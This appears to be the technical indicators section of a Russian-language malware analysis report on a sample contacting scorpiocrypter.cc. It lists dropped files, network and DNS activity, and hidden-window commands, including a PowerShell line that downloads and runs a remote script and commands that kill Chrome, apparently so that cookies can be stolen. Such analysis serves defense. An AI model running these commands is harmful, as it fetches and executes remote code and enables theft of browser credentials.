Техническая информация
- https://scorpiocrypter.cc/halka.ps1
- '%WINDIR%\syswow64\taskkill.exe' /F /IM powershell.exe
- '%WINDIR%\syswow64\taskkill.exe' /F /IM chrome.exe /T
- %TEMP%\util_helper.exe
- %TEMP%\log_zqvayzvoe_user.txt
- 'sc####ocrypter.cc':443
- 'sc####ocrypter.cc':443
- DNS ASK sc####ocrypter.cc
- ClassName: '' WindowName: ''
- '%WINDIR%\syswow64\wbem\wmic.exe' process where "name like '%chrome%'" delete (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command "Get-Process chrome* | Stop-Process -Force" (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cd /d "%TEMP%\" && cookie.exe (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://scorpiocrypter.cc/halka.ps1')" (со скрытым окном)
- '%WINDIR%\syswow64\taskkill.exe' /F /IM powershell.exe (со скрытым окном)
- '%WINDIR%\syswow64\taskkill.exe' /F /IM chrome.exe /T (со скрытым окном)